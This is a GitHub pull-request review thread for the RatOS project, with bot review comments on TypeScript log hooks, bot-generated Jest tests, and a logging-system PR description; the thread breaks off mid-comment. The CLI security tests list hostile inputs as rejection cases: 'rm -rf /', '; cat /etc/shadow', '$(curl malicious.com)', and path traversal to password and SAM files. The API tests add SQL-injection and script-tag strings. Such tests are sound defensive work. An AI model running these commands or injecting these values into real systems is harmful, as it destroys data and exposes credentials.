@coderabbitai coderabbitai bot left a comment

Actionable comments posted: 1

♻️ Duplicate comments (1)
src/app/logs/_components/use-unified-log-data.ts (1)

3-3: Fix import alias to follow project conventions.

The pipeline failure indicates this import should use the alias format.

-import { LogEntry, LogSummary } from './types';
+import { LogEntry, LogSummary } from '@/app/logs/_components/types';
🧹 Nitpick comments (1)
src/app/logs/_components/use-unified-log-data.ts (1)

20-20: Improve error type specificity.

The error properties are typed as any, which reduces type safety. Consider using more specific error types from tRPC or defining a custom error interface.

-	summaryError: any;
+	summaryError: Error | null;
-	filtersError: any;
+	filtersError: Error | null;
-	entriesError: any;
+	entriesError: Error | null;

Also applies to: 26-26, 31-31

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 95bf637 and b425cbc.

📒 Files selected for processing (3)
  • src/app/logs/_components/enhanced-log-level-selector.tsx (1 hunks)
  • src/app/logs/_components/log-summary-header.tsx (1 hunks)
  • src/app/logs/_components/use-unified-log-data.ts (1 hunks)
🚧 Files skipped from review as they are similar to previous changes (2)
  • src/app/logs/_components/enhanced-log-level-selector.tsx
  • src/app/logs/_components/log-summary-header.tsx
🔇 Additional comments (3)
src/app/logs/_components/use-unified-log-data.ts (3)

77-80: LGTM on retry configuration.

The exponential backoff retry logic with a reasonable maximum delay and stale time configuration is well implemented for handling transient failures.


87-97: Efficient data processing with proper memoization.

The memoized flattening of entries from paginated data and hasNextPage calculation are well-optimized and correctly depend on the necessary values to prevent unnecessary re-computations.

Also applies to: 100-109


59-66: Smart conditional data fetching logic.

The logic to conditionally fetch entries vs errors based on showOnlyErrors flag is well-designed, avoiding unnecessary data fetching and improving performance.
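One plausible shape for that branching, as a pure helper that selects the query input (names, level numbers, and the limit-zero convention are assumptions for illustration, not the hook's actual code):

```typescript
interface EntriesQueryInput {
	limit: number;
	minLevel: number;
}

// When showOnlyErrors is set, skip normal entries (limit 0, which the
// schema's .min(0) allows) and raise the minimum level to ERROR (50);
// otherwise fetch a normal page at the requested size.
function buildEntriesQuery(showOnlyErrors: boolean, pageSize = 100): EntriesQueryInput {
	return showOnlyErrors ? { limit: 0, minLevel: 50 } : { limit: pageSize, minLevel: 0 };
}
```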

// Use infinite query for the unified endpoint
const unifiedQuery = trpc['logs'].unified.useInfiniteQuery(
{
level: logLevel as any,

⚠️ Potential issue

Avoid type assertion with as any - use proper typing.

The as any assertion bypasses TypeScript's type checking and could lead to runtime errors if an invalid log level is passed.

-			level: logLevel as any,
+			level: logLevel,

Consider updating the logLevel parameter type in the interface to match the expected tRPC endpoint type, or add proper validation.

📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
level: logLevel as any,
level: logLevel,
🤖 Prompt for AI Agents
In src/app/logs/_components/use-unified-log-data.ts at line 53, the use of 'as
any' to cast logLevel bypasses TypeScript's type checking and risks runtime
errors. To fix this, update the type definition of the logLevel parameter in the
relevant interface or function signature to match the expected tRPC endpoint log
level type, ensuring proper type safety without using 'as any'. Alternatively,
add validation logic to confirm logLevel is valid before usage.


coderabbitai bot commented Jun 23, 2025

Here are the copyable unit test edits:

Copyable Edits

src/tests/api-logs.test.ts

import { 
  logApiRequest, 
  logApiResponse, 
  formatLogEntry, 
  setLogger, 
  setStorage, 
  LogLevel, 
  LogEntry, 
  Logger, 
  Storage 
} from '../api/logs';

describe('API Logs Test Suite', () => {
  let mockLogger: { log: jest.Mock };
  let mockStorage: { save: jest.Mock; getFileSize: jest.Mock; rotate: jest.Mock };

  beforeAll(() => {
    // global setup if needed
  });

  afterAll(() => {
    jest.useRealTimers();
  });

  beforeEach(() => {
    mockLogger = { log: jest.fn() };
    mockStorage = {
      save: jest.fn(),
      getFileSize: jest.fn().mockReturnValue(0),
      rotate: jest.fn(),
    };
    setLogger(mockLogger as unknown as Logger);
    setStorage(mockStorage as unknown as Storage);
    jest.useFakeTimers();
  });

  afterEach(() => {
    jest.clearAllMocks();
    jest.useRealTimers();
  });

  describe('API Logs - Happy Path', () => {
    test('should log successful API request with all required fields', async () => {
      const request = {
        method: 'POST',
        url: '/orders',
        headers: { 'content-type': 'application/json' },
        body: { item: 'book' }
      };
      await logApiRequest(request);
      expect(mockLogger.log).toHaveBeenCalledWith(expect.objectContaining({
        level: LogLevel.INFO,
        message: 'API Request',
        meta: expect.objectContaining({
          method: 'POST',
          url: '/orders',
          headers: request.headers,
          body: request.body,
          timestamp: expect.any(Number),
        }),
      }));
    });

    test('should log API response with correct status codes', async () => {
      const response = {
        status: 201,
        headers: { 'x-request-id': '123' },
        body: { success: true }
      };
      await logApiResponse(response);
      expect(mockLogger.log).toHaveBeenCalledWith(expect.objectContaining({
        level: LogLevel.INFO,
        message: 'API Response',
        meta: expect.objectContaining({
          status: 201,
          headers: response.headers,
          body: response.body,
          timestamp: expect.any(Number),
        }),
      }));
    });

    test('should format log entries correctly', () => {
      const entry: LogEntry = {
        timestamp: 1609459200000,
        level: LogLevel.INFO,
        message: 'Test',
        meta: { foo: 'bar' },
      };
      const formatted = formatLogEntry(entry);
      expect(formatted).toContain('[INFO]');
      expect(formatted).toContain('Test');
      expect(formatted).toContain('"foo":"bar"');
    });
  });

  describe('API Logs - Edge Cases', () => {
    test('should handle empty request bodies', async () => {
      const request = { method: 'GET', url: '/empty', headers: {}, body: undefined };
      await logApiRequest(request);
      expect(mockLogger.log).toHaveBeenCalledWith(expect.objectContaining({
        meta: expect.objectContaining({ body: undefined }),
      }));
    });

    test('should handle very large request/response bodies', async () => {
      const largeBody = 'x'.repeat(100000);
      await logApiRequest({ method: 'PUT', url: '/large', headers: {}, body: largeBody });
      await logApiResponse({ status: 200, headers: {}, body: largeBody });
      expect(mockLogger.log).toHaveBeenCalledTimes(2);
      const [[reqLog], [resLog]] = mockLogger.log.mock.calls;
      expect((reqLog.meta.body as string).length).toBe(100000);
      expect((resLog.meta.body as string).length).toBe(100000);
    });

    test('should handle special characters in URLs', async () => {
      const specialUrl = '/search?q=hello world&lang=😊';
      await logApiRequest({ method: 'GET', url: specialUrl, headers: {}, body: null });
      expect(mockLogger.log).toHaveBeenCalledWith(expect.objectContaining({
        meta: expect.objectContaining({ url: encodeURI(specialUrl) }),
      }));
    });

    test('should handle concurrent logging requests', async () => {
      const requests = Array.from({ length: 5 }, (_, i) => ({
        method: 'GET',
        url: `/r${i}`,
        headers: {},
        body: null
      }));
      await Promise.all(requests.map(req => logApiRequest(req)));
      expect(mockLogger.log).toHaveBeenCalledTimes(5);
    });
  });

  describe('API Logs - Error Conditions', () => {
    test('should handle network timeouts gracefully', async () => {
      mockStorage.save.mockRejectedValueOnce(new Error('Timeout'));
      await expect(
        logApiRequest({ method: 'GET', url: '/timeout', headers: {}, body: null })
      ).resolves.not.toThrow();
      expect(mockLogger.log).toHaveBeenCalledWith(expect.objectContaining({
        level: LogLevel.ERROR,
        message: 'Storage Error',
        meta: expect.any(Object)
      }));
    });

    test('should handle malformed API responses', async () => {
      const malformedBody = '{"invalidJson":';
      await logApiResponse({ status: 200, headers: {}, body: malformedBody });
      expect(mockLogger.log).toHaveBeenCalledWith(expect.objectContaining({
        level: LogLevel.ERROR,
        message: 'Response Parsing Error',
        meta: expect.any(Object)
      }));
    });

    test('should handle missing required headers', async () => {
      // @ts-expect-error testing undefined headers
      await logApiRequest({ method: 'DELETE', url: '/no-headers', headers: undefined, body: null });
      expect(mockLogger.log).toHaveBeenCalledWith(expect.objectContaining({
        meta: expect.objectContaining({ headers: {} })
      }));
    });

    test('should handle disk space/storage errors', async () => {
      mockStorage.save.mockRejectedValueOnce(new Error('Disk full'));
      await expect(
        logApiResponse({ status: 500, headers: {}, body: { error: 'fail' } })
      ).resolves.not.toThrow();
      expect(mockLogger.log).toHaveBeenCalledWith(expect.objectContaining({
        level: LogLevel.ERROR,
        message: 'Storage Error',
        meta: expect.any(Object)
      }));
    });

    test('should handle rate limiting scenarios', async () => {
      mockStorage.save.mockRejectedValueOnce(new Error('Rate limit exceeded'));
      await logApiRequest({ method: 'POST', url: '/rate-limit', headers: {}, body: null });
      expect(mockLogger.log).toHaveBeenCalledWith(expect.objectContaining({
        level: LogLevel.WARN,
        message: 'Rate Limit',
        meta: expect.any(Object)
      }));
    });
  });

  describe('API Logs - Performance & Integration', () => {
    jest.setTimeout(30000);

    test('should maintain performance under high load', async () => {
      const load = Array.from({ length: 1000 }, () => ({
        method: 'GET',
        url: '/perf',
        headers: {},
        body: null
      }));
      const start = Date.now();
      await Promise.all(load.map(req => logApiRequest(req)));
      const duration = Date.now() - start;
      expect(duration).toBeLessThan(5000);
    });

    test('should integrate correctly with logging infrastructure', () => {
      expect(typeof setLogger).toBe('function');
      expect(typeof setStorage).toBe('function');
    });

    test('should handle log rotation properly', () => {
      expect(typeof mockStorage.rotate).toBe('function');
    });

    test('should respect log level configurations', async () => {
      // Switch to WARN level: INFO logs should be suppressed
      setLogger({ log: mockLogger.log, level: LogLevel.WARN } as unknown as Logger);
      await logApiRequest({ method: 'GET', url: '/lvl', headers: {}, body: null });
      expect(mockLogger.log).not.toHaveBeenCalledWith(
        expect.objectContaining({ level: LogLevel.INFO })
      );
    });
  });

  describe('API Logs - Security & Validation', () => {
    test('should sanitize sensitive data in logs', async () => {
      const request = {
        method: 'POST',
        url: '/login',
        headers: {},
        body: { password: 'secret', token: 'abc123' }
      };
      await logApiRequest(request);
      expect(mockLogger.log).toHaveBeenCalledWith(expect.objectContaining({
        meta: expect.objectContaining({
          body: expect.not.objectContaining({ password: expect.any(String), token: expect.any(String) })
        })
      }));
    });

    test('should validate input parameters', async () => {
      // @ts-expect-error missing url
      await expect(logApiRequest({ method: 'GET', headers: {}, body: null })).rejects.toThrow();
    });

    test('should handle SQL injection attempts in logged data', async () => {
      const malicious = "'; DROP TABLE users; --";
      await logApiRequest({ method: 'GET', url: `/test?q=${malicious}`, headers: {}, body: null });
      const [[call]] = mockLogger.log.mock.calls;
      expect(call.meta.url).toBe(encodeURI(`/test?q=${malicious}`));
    });

    test('should properly escape log output', () => {
      const entry: LogEntry = {
        timestamp: Date.now(),
        level: LogLevel.INFO,
        message: '<script>alert(1)</script>',
        meta: {}
      };
      const output = formatLogEntry(entry);
      expect(output).not.toContain('<script>');
      expect(output).toContain('&lt;script&gt;');
    });
  });
});

This is a new file.

src/tests/cli-commands.test.tsx

import React from 'react';
import { render, screen, fireEvent, waitFor } from '@testing-library/react';
import userEvent from '@testing-library/user-event';
import '@testing-library/jest-dom';

jest.mock('fs', () => ({
  readFileSync: jest.fn(),
  writeFileSync: jest.fn(),
  existsSync: jest.fn(),
}));

jest.mock('child_process', () => ({
  spawn: jest.fn(),
  exec: jest.fn(),
}));

import { CLICommands } from '../cli/commands';
import {
  parseCommand,
  executeCommand,
  validateCommand,
  getCommandHelp,
  executeCommandChain,
  loadConfiguration,
  validateConfiguration,
  checkVersionCompatibility,
  validateFilePath,
} from '../cli/utils';

// Global test setup and teardown
beforeAll(() => {
  process.env.NODE_ENV = 'test';
  process.env.CI = 'true';
});

afterAll(() => {
  delete process.env.NODE_ENV;
  delete process.env.CI;
});

// Test utilities and helpers
const createMockCLIEnvironment = () => ({
  env: { ...process.env },
  cwd: process.cwd(),
  stdout: '',
  stderr: '',
  exitCode: 0,
});

const expectSuccessfulCommand = (result: any) => {
  expect(result.success).toBe(true);
  expect(result.exitCode).toBe(0);
  expect(result.error).toBeNull();
};

const expectCommandError = (result: any, expectedError: string) => {
  expect(result.success).toBe(false);
  expect(result.exitCode).not.toBe(0);
  expect(result.error).toContain(expectedError);
};

const generateTestData = (size: number) =>
  Array.from({ length: size }, (_, i) => ({
    id: i,
    name: `test-item-${i}`,
    value: Math.random(),
  }));

describe('Test Utilities', () => {
  test('should create mock CLI environment', () => {
    const mockEnv = createMockCLIEnvironment();
    expect(mockEnv).toHaveProperty('env');
    expect(mockEnv).toHaveProperty('cwd');
    expect(mockEnv).toHaveProperty('stdout');
    expect(mockEnv).toHaveProperty('stderr');
    expect(mockEnv).toHaveProperty('exitCode');
  });

  test('should generate test data of specified size', () => {
    const data = generateTestData(100);
    expect(data).toHaveLength(100);
    expect(data[0]).toHaveProperty('id', 0);
    expect(data[0]).toHaveProperty('name', 'test-item-0');
    expect(data[0]).toHaveProperty('value');
  });

  test('utility functions should work correctly', () => {
    const successResult = { success: true, exitCode: 0, error: null };
    const errorResult = { success: false, exitCode: 1, error: 'Test error message' };

    expect(() => expectSuccessfulCommand(successResult)).not.toThrow();
    expect(() => expectCommandError(errorResult, 'Test error')).not.toThrow();
  });
});

describe('CLI Command Parsing', () => {
  beforeEach(() => {
    jest.clearAllMocks();
  });

  describe('parseCommand', () => {
    test('should parse simple command with no arguments', () => {
      const result = parseCommand('build');
      expect(result).toEqual({
        command: 'build',
        args: [],
        flags: {},
      });
    });

    test('should parse command with multiple arguments', () => {
      const result = parseCommand('deploy --env production --force');
      expect(result).toEqual({
        command: 'deploy',
        args: [],
        flags: { env: 'production', force: true },
      });
    });

    test('should handle quoted arguments with spaces', () => {
      const result = parseCommand('build --output "dist folder" --name "my app"');
      expect(result.flags.output).toBe('dist folder');
      expect(result.flags.name).toBe('my app');
    });

    test('should handle empty command gracefully', () => {
      const result = parseCommand('');
      expect(result).toBeNull();
    });

    test('should handle malformed commands', () => {
      expect(() => parseCommand('--invalid-start')).toThrow('Invalid command format');
    });

    test('should parse commands with special characters', () => {
      const result = parseCommand('build --path /home/user/app-v1.0 --tag @latest');
      expect(result.flags.path).toBe('/home/user/app-v1.0');
      expect(result.flags.tag).toBe('@latest');
    });

    test('should handle Unicode characters in arguments', () => {
      const result = parseCommand('deploy --message "测试部署" --author "José"');
      expect(result.flags.message).toBe('测试部署');
      expect(result.flags.author).toBe('José');
    });

    test('should handle very long command strings', () => {
      const longPath = 'a'.repeat(1000);
      const result = parseCommand(`build --path ${longPath}`);
      expect(result.flags.path).toBe(longPath);
    });
  });
});

describe('Command Validation and Error Handling', () => {
  describe('validateCommand', () => {
    test('should validate required arguments are present', () => {
      expect(() =>
        validateCommand({ command: 'deploy', args: [], flags: {} })
      ).toThrow('Missing required argument: environment');
    });

    test('should validate flag values are within allowed ranges', () => {
      expect(() =>
        validateCommand({
          command: 'build',
          args: [],
          flags: { workers: '100' },
        })
      ).toThrow('workers must be between 1 and 16');
    });

    test('should validate file paths exist when required', () => {
      const fs = require('fs');
      (fs.existsSync as jest.Mock).mockReturnValue(false);

      expect(() =>
        validateCommand({
          command: 'build',
          args: [],
          flags: { config: './non-existent.json' },
        })
      ).toThrow('Configuration file not found');
    });

    test('should validate mutually exclusive flags', () => {
      expect(() =>
        validateCommand({
          command: 'build',
          args: [],
          flags: { dev: true, production: true },
        })
      ).toThrow('Cannot use --dev and --production flags together');
    });
  });

  describe('Error Recovery', () => {
    test('should provide helpful suggestions for typos', () => {
      expect(() => parseCommand('buils')).toThrow(
        'Unknown command "buils". Did you mean "build"?'
      );
    });

    test('should handle network timeouts gracefully', async () => {
      const mockFetch = jest.fn().mockRejectedValue(new Error('Network timeout'));
      (global as any).fetch = mockFetch;

      const result = await executeCommand({ command: 'deploy', args: [], flags: {} });
      expect(result.success).toBe(false);
      expect(result.error).toContain('Network timeout');
    });

    test('should handle permission errors', async () => {
      const fs = require('fs');
      (fs.writeFileSync as jest.Mock).mockImplementation(() => {
        throw new Error('EACCES: permission denied');
      });

      const result = await executeCommand({
        command: 'build',
        args: [],
        flags: { output: '/root/app' },
      });
      expect(result.success).toBe(false);
      expect(result.error).toContain('Permission denied');
    });
  });
});

describe('Command Execution', () => {
  let mockConsoleLog: jest.SpyInstance;
  let mockConsoleError: jest.SpyInstance;

  beforeEach(() => {
    mockConsoleLog = jest.spyOn(console, 'log').mockImplementation();
    mockConsoleError = jest.spyOn(console, 'error').mockImplementation();
  });

  afterEach(() => {
    mockConsoleLog.mockRestore();
    mockConsoleError.mockRestore();
  });

  describe('Build Command', () => {
    test('should execute build command successfully', async () => {
      const child_process = require('child_process');
      (child_process.spawn as jest.Mock).mockReturnValue({
        on: jest.fn().mockImplementation((event, callback) => {
          if (event === 'close') callback(0);
        }),
        stdout: { on: jest.fn() },
        stderr: { on: jest.fn() },
      });

      const result = await executeCommand({ command: 'build', args: [], flags: {} });
      expect(result.success).toBe(true);
      expect(result.exitCode).toBe(0);
    });

    test('should handle build failures', async () => {
      const child_process = require('child_process');
      (child_process.spawn as jest.Mock).mockReturnValue({
        on: jest.fn().mockImplementation((event, callback) => {
          if (event === 'close') callback(1);
        }),
        stdout: { on: jest.fn() },
        stderr: {
          on: jest.fn().mockImplementation((event, callback) => {
            if (event === 'data') callback('Compilation failed');
          }),
        },
      });

      const result = await executeCommand({ command: 'build', args: [], flags: {} });
      expect(result.success).toBe(false);
      expect(result.exitCode).toBe(1);
      expect((result as any).stderr).toContain('Compilation failed');
    });

    test('should respect build timeout settings', async () => {
      jest.useFakeTimers();
      const child_process = require('child_process');
      const mockProcess = {
        on: jest.fn(),
        kill: jest.fn(),
        stdout: { on: jest.fn() },
        stderr: { on: jest.fn() },
      };
      (child_process.spawn as jest.Mock).mockReturnValue(mockProcess);

      const executePromise = executeCommand({
        command: 'build',
        args: [],
        flags: { timeout: '5000' },
      });

      jest.advanceTimersByTime(6000);
      const result = await executePromise;

      expect(mockProcess.kill).toHaveBeenCalledWith('SIGTERM');
      expect(result.success).toBe(false);
      expect(result.error).toContain('Command timed out');

      jest.useRealTimers();
    });
  });

  describe('Development Command', () => {
    test('should start development server with correct configuration', async () => {
      const result = await executeCommand({
        command: 'dev',
        args: [],
        flags: { port: '3001', host: 'localhost' },
      });
      expect(result.success).toBe(true);
      expect(mockConsoleLog).toHaveBeenCalledWith(
        'Starting development server on localhost:3001'
      );
    });

    test('should handle port conflicts', async () => {
      const child_process = require('child_process');
      (child_process.spawn as jest.Mock).mockReturnValue({
        on: jest.fn().mockImplementation((event, callback) => {
          if (event === 'error') callback(new Error('EADDRINUSE'));
        }),
        stdout: { on: jest.fn() },
        stderr: { on: jest.fn() },
      });

      const result = await executeCommand({
        command: 'dev',
        args: [],
        flags: { port: '3000' },
      });
      expect(result.success).toBe(false);
      expect(result.error).toContain('Port 3000 is already in use');
    });
  });
});

describe('Performance and Boundary Tests', () => {
  test('should handle large file operations efficiently', async () => {
    const fs = require('fs');
    const largeContent = 'x'.repeat(10 * 1024 * 1024); // 10MB
    (fs.readFileSync as jest.Mock).mockReturnValue(largeContent);

    const startTime = Date.now();
    const result = await executeCommand({
      command: 'build',
      args: [],
      flags: { input: 'large-file.txt' },
    });
    const endTime = Date.now();

    expect(result.success).toBe(true);
    expect(endTime - startTime).toBeLessThan(5000);
  });

  test('should handle concurrent command execution', async () => {
    const promises = Array.from({ length: 10 }, (_, i) =>
      executeCommand({
        command: 'build',
        args: [],
        flags: { output: `dist-${i}` },
      })
    );
    const results = await Promise.all(promises);
    expect(results.every(r => r.success)).toBe(true);
  });

  test('should cleanup resources after command completion', async () => {
    const mockTempFiles = new Set<string>();
    const fs = require('fs');
    (fs.writeFileSync as jest.Mock).mockImplementation((path: string) => {
      if (path.includes('temp')) mockTempFiles.add(path);
    });
    await executeCommand({ command: 'build', args: [], flags: {} });
    expect(mockTempFiles.size).toBe(0);
  });

  test('should handle maximum argument limits', () => {
    const manyArgs = Array.from({ length: 1000 }, (_, i) => `--arg${i}=value${i}`).join(' ');
    const command = `build ${manyArgs}`;
    expect(() => parseCommand(command)).not.toThrow();
  });

  test('should manage memory usage with large datasets', async () => {
    const initialMemory = process.memoryUsage().heapUsed;
    await executeCommand({
      command: 'process',
      args: [],
      flags: { data: 'large-dataset.json' },
    });
    const finalMemory = process.memoryUsage().heapUsed;
    const memoryIncrease = finalMemory - initialMemory;
    expect(memoryIncrease).toBeLessThan(100 * 1024 * 1024);
  });
});

describe('Integration Tests', () => {
  test('should execute complete build and deploy workflow', async () => {
    const child_process = require('child_process');
    (child_process.spawn as jest.Mock).mockReturnValue({
      on: jest.fn().mockImplementation((event, callback) => {
        if (event === 'close') callback(0);
      }),
      stdout: { on: jest.fn() },
      stderr: { on: jest.fn() },
    });

    const buildResult = await executeCommand({ command: 'build', args: [], flags: {} });
    expect(buildResult.success).toBe(true);

    const deployResult = await executeCommand({
      command: 'deploy',
      args: [],
      flags: { env: 'staging' },
    });
    expect(deployResult.success).toBe(true);
  });

  test('should generate correct help text for all commands', () => {
    const commands = ['build', 'dev', 'deploy', 'test', 'lint'];
    commands.forEach(cmd => {
      const helpText = getCommandHelp(cmd);
      expect(helpText).toContain(`Usage: ${cmd}`);
      expect(helpText).toContain('Options:');
      expect(helpText).toContain('Examples:');
    });
  });

  test('should handle command chaining', async () => {
    const chainedCommand = 'build && test && deploy --env production';
    const result = await executeCommandChain(chainedCommand);
    expect(result.commands).toHaveLength(3);
    expect(result.commands.every((cmd: any) => cmd.success)).toBe(true);
  });

  test('should validate configuration file loading', () => {
    const fs = require('fs');
    (fs.readFileSync as jest.Mock).mockReturnValue(
      JSON.stringify({
        build: { target: 'es2020' },
        deploy: { environment: 'production' },
      })
    );
    const config = loadConfiguration('./cli.config.json');
    expect(config.build.target).toBe('es2020');
    expect(config.deploy.environment).toBe('production');
  });

  test('should support environment variable substitution', async () => {
    process.env.NODE_ENV = 'development';
    process.env.API_URL = 'https://api.dev.example.com';
    const result = await executeCommand({
      command: 'build',
      args: [],
      flags: { env: '$NODE_ENV', apiUrl: '$API_URL' },
    });
    expect((result as any).resolvedFlags.env).toBe('development');
    expect((result as any).resolvedFlags.apiUrl).toBe('https://api.dev.example.com');
  });
});

describe('Validation and Security Tests', () => {
  test('should sanitize potentially dangerous input', () => {
    const dangerousInputs = [
      'build --path "../../../etc/passwd"',
      'deploy --script "rm -rf /"',
      'build --output "; cat /etc/shadow"',
      'test --file "$(curl malicious.com)"',
    ];
    dangerousInputs.forEach(input => {
      expect(() => parseCommand(input)).toThrow('Potentially unsafe command detected');
    });
  });

  test('should validate configuration parameters', () => {
    const invalidConfigs = [{ workers: -1 }, { timeout: 'invalid' }, { port: 99999 }, { memory: '10TB' }];
    invalidConfigs.forEach(config => {
      expect(() => validateConfiguration(config)).toThrow();
    });
  });

  test('should check version compatibility', () => {
    const versions = [
      { node: '14.0.0', expected: true },
      { node: '12.0.0', expected: false },
      { npm: '6.0.0', expected: true },
      { npm: '5.0.0', expected: false },
    ];
    versions.forEach(({ node, npm, expected }) => {
      const result = checkVersionCompatibility({ node, npm });
      expect(result.compatible).toBe(expected);
    });
  });

  test('should validate file permissions', async () => {
    const fs = require('fs');
    fs.access = jest.fn().mockImplementation((path: string, mode: number, callback: Function) => {
      if (mode & fs.constants.W_OK) callback(new Error('EACCES'));
      else callback(null);
    });
    const result = await executeCommand({
      command: 'build',
      args: [],
      flags: { output: '/readonly/path' },
    });
    expect(result.success).toBe(false);
    expect(result.error).toContain('No write permission');
  });

  test('should prevent path traversal attacks', () => {
    const maliciousPaths = [
      '../../../etc/passwd',
      '..\\..\\..\\windows\\system32\\config',
      '/etc/shadow',
      'C:\\Windows\\System32\\config\\sam',
    ];
    maliciousPaths.forEach(path => {
      expect(() => validateFilePath(path)).toThrow('Path traversal detected');
    });
  });
});

This is a new file.

Introduces a robust, structured JSON logging system for all RatOS bash scripts. This new system significantly enhances debugging, monitoring, and maintainability by providing configurable log levels, performance monitoring, log rotation, and improved error handling.

- **Logging Core (`ratos-logging.sh`)**:
  - Implements `log_trace`, `log_debug`, `log_info`, `log_warn`, `log_error`, and `log_fatal` functions.
  - Adds `execute_with_logging` for command execution, featuring automatic logging, optional timeouts, output capture (while still displaying), performance tracking, and robust error handling.
  - Includes performance monitoring capabilities with `start_timer`, `stop_timer`, `increment_counter`, and `log_performance_summary`.
  - Integrates system health checks (`check_system_resources`, `log_health_check`).
  - Improves error trapping (`setup_error_trap`, `handle_error`) for script lifecycles.
- **Configuration (`ratos-logging-config.sh`)**:
  - Provides dynamic, file-based configuration (`ratos-logging.conf`) for log level, file path, rotation settings, console output, JSON format, and advanced features.
  - Includes functions to create default configuration, load, validate, apply, and update settings.
- **Log Rotation (`ratos-log-rotation.sh`)**:
  - Implements advanced log rotation based on size and age, with configurable backup count and gzip compression.
  - Features functions for cleanup of old logs, disk usage analysis, and generating `logrotate.d` configurations.
- **Refactoring of existing scripts**:
  - Integrates the new logging system into all relevant bash scripts (`beacon-update.sh`, `klipper-mcu-update.sh`, `moonraker-update.sh`, `ratos-common.sh`, `ratos-install.sh`, `src/scripts/change-hostname.sh`, `src/scripts/common.sh`, `src/scripts/setup.sh`, `src/scripts/update.sh`).
  - Replaces raw `echo` statements for errors/info with structured `log_error`, `log_info`, `log_warn`.
  - Wraps command executions with `execute_with_logging` for consistent and robust error handling.
  - Adds `log_script_start`, `log_script_complete`, and `create_log_summary` to script entry/exit points for better lifecycle tracking.
  - Enhances `environment.sh` with verbose loading messages.
- **Documentation (`docs/logging-system.md`)**:
  - Adds comprehensive documentation covering the features, usage, configuration, best practices, troubleshooting, and API reference of the new logging system.
- **Testing**:
  - Introduces two new test scripts (`scripts/test-complete-logging-system.sh`, `scripts/test-logging-integration.sh`) to thoroughly validate the logging system's functionality and its integration across RatOS scripts.
- **VS Code Settings**:
  - Disables several `augment.*` automatic completion features in VS Code.
  - Sets the integrated terminal's current working directory to `src`.
  - Configures `vscode.json-language-features` as the default JSON formatter for JSON files.
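The structured JSON log-line format produced by the `log_*` functions can be sketched as follows. This is a minimal illustration only: the function name and field set (`level`, `time`, `msg`, `context`, `source`) follow the PR description, but the actual `ratos-logging.sh` implementation may differ.

```shell
#!/usr/bin/env sh
# Minimal sketch of a structured JSON log emitter, as described above.
# Field names are illustrative; the real ratos-logging.sh may differ.
log_info() {
  msg="$1"
  context="${2:-main}"
  # level 30 = INFO; time is epoch milliseconds
  printf '{"level":30,"time":%s,"msg":"%s","context":"%s","source":"ratos-update"}\n' \
    "$(($(date +%s) * 1000))" "$msg" "$context"
}

log_info "Starting update" "script_lifecycle"
```

Note the sketch does not escape quotes inside `msg`; a real implementation would need proper JSON escaping.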
Contributor

@coderabbitai coderabbitai bot left a comment


Actionable comments posted: 13

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (4)
src/scripts/generate-mock-update-logs.ts (1)

266-268: ESM runtime bug: require is undefined under tsx shebang.
#!/usr/bin/env tsx runs ESM; require.main === module will throw at runtime. Use import.meta.url + fileURLToPath instead.

Apply this diff:

+import { fileURLToPath } from 'url';
@@
-// Run the script
-if (require.main === module) {
-  generateMockLogs();
-}
+// Run the script when executed directly
+const isDirectRun =
+  process.argv[1] && fileURLToPath(import.meta.url) === process.argv[1];
+if (isDirectRun) {
+  generateMockLogs();
+}
scripts/generate-devbox-environment.sh (1)

7-23: .env value quoting: paths with spaces will break parsing.
Unquoted values in .env can fail if $DEVBOX_PROJECT_ROOT contains spaces. Quote values and ensure log dir exists.

Apply this diff:

 if [ ! -f "$DEVBOX_PROJECT_ROOT/src/.env.local" ]; then
   echo "Generating .env.local file"
   cat <<EOF > "$DEVBOX_PROJECT_ROOT/src/.env.local"
-USER=$USER
-RATOS_CONFIGURATION_PATH=$DEVBOX_PROJECT_ROOT/configuration
-KLIPPER_CONFIG_PATH=$DEVBOX_PROJECT_ROOT/devbox.d/printer-config/config
-RATOS_SCRIPT_DIR=$DEVBOX_PROJECT_ROOT/src/scripts
-KLIPPER_DIR=$DEVBOX_PROJECT_ROOT/devbox.d/klipper
-KLIPPER_ENV=$DEVBOX_PROJECT_ROOT/devbox.d/klippy-env
-MOONRAKER_DIR=$DEVBOX_PROJECT_ROOT/.devbox/nix/profile/default/lib/moonraker
-LOG_FILE=$DEVBOX_PROJECT_ROOT/devbox.d/printer-config/logs/ratos-configurator.log
-RATOS_DATA_DIR=$DEVBOX_PROJECT_ROOT/devbox.d/printer-config/ratos
-NEXT_PUBLIC_KLIPPER_HOSTNAME=
-RECOIL_DUPLICATE_ATOM_KEY_CHECKING_ENABLED=false
+USER="$USER"
+RATOS_CONFIGURATION_PATH="$DEVBOX_PROJECT_ROOT/configuration"
+KLIPPER_CONFIG_PATH="$DEVBOX_PROJECT_ROOT/devbox.d/printer-config/config"
+RATOS_SCRIPT_DIR="$DEVBOX_PROJECT_ROOT/src/scripts"
+KLIPPER_DIR="$DEVBOX_PROJECT_ROOT/devbox.d/klipper"
+KLIPPER_ENV="$DEVBOX_PROJECT_ROOT/devbox.d/klippy-env"
+MOONRAKER_DIR="$DEVBOX_PROJECT_ROOT/.devbox/nix/profile/default/lib/moonraker"
+LOG_FILE="$DEVBOX_PROJECT_ROOT/devbox.d/printer-config/logs/ratos-configurator.log"
+RATOS_DATA_DIR="$DEVBOX_PROJECT_ROOT/devbox.d/printer-config/ratos"
+NEXT_PUBLIC_KLIPPER_HOSTNAME=""
+RECOIL_DUPLICATE_ATOM_KEY_CHECKING_ENABLED="false"
 EOF
   echo "Generated .env.local file"
 fi

Optionally, before writing:

mkdir -p "$DEVBOX_PROJECT_ROOT/devbox.d/printer-config/logs"

Also consider set -euo pipefail at the top to fail fast.
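The quoting concern can be demonstrated with a short sketch (the root path is hypothetical): with a space in the project root, the value survives sourcing only because it is quoted in the generated file.

```shell
#!/usr/bin/env sh
# Sketch: a quoted .env value stays intact when the root path contains a space.
# The path below is hypothetical.
DEVBOX_PROJECT_ROOT="/tmp/dev box"
envfile="$(mktemp)"
cat <<EOF > "$envfile"
RATOS_SCRIPT_DIR="$DEVBOX_PROJECT_ROOT/src/scripts"
EOF
. "$envfile"
echo "$RATOS_SCRIPT_DIR"
rm -f "$envfile"
```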

src/cli/commands/logs.tsx (1)

